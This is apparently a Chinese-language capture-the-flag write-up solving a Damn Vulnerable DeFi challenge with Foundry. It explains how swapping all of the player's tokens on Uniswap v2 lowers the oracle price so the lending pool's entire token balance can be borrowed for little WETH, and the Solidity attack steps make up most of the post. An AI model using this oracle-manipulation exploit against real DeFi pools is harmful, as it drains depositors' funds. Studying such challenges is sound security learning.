为了系统的学习solidity和foundry,我基于foundry测试框架重新编写damnvulnerable-defi的题解,欢迎交流和共建~🎉
这道题的攻击思路和Puppet- v1的思路类似,仍然是利用uniswap价格预言机对pool进行攻击,
值得注意的是这里使用的都是uniswap-v2,在v2中使用的是token和weth的代币对,但是player用户开始只有eth,需要与weth合约进行交互
完整的攻击流程如下图所示:
swapExactTokensForTokens
将player账户中的全部token换成weth,从而降低token在uniswap中的单价borrow
方法,将pool中的全部token借出
完整的步骤代码示例如下:
token.approve(address(uniswapV2Router), PLAYER_INITIAL_TOKEN_BALANCE);
address[] memory path = new address[](2);
path[0] = address(token);
path[1] = address(weth);
// swap token to weth
uniswapV2Router.swapExactTokensForTokens(
PLAYER_INITIAL_TOKEN_BALANCE, // amount in
1, // amount out min
path, // path
address(player), // to
block.timestamp*2 // deadline
);
uint256 value = pool.calculateDepositOfWETHRequired(POOL_INITIAL_TOKEN_BALANCE);
uint256 depositValue = value - weth.balanceOf(address(player));
weth.deposit{value: depositValue}();
weth.approve(address(pool), value);
pool.borrow(POOL_INITIAL_TOKEN_BALANCE);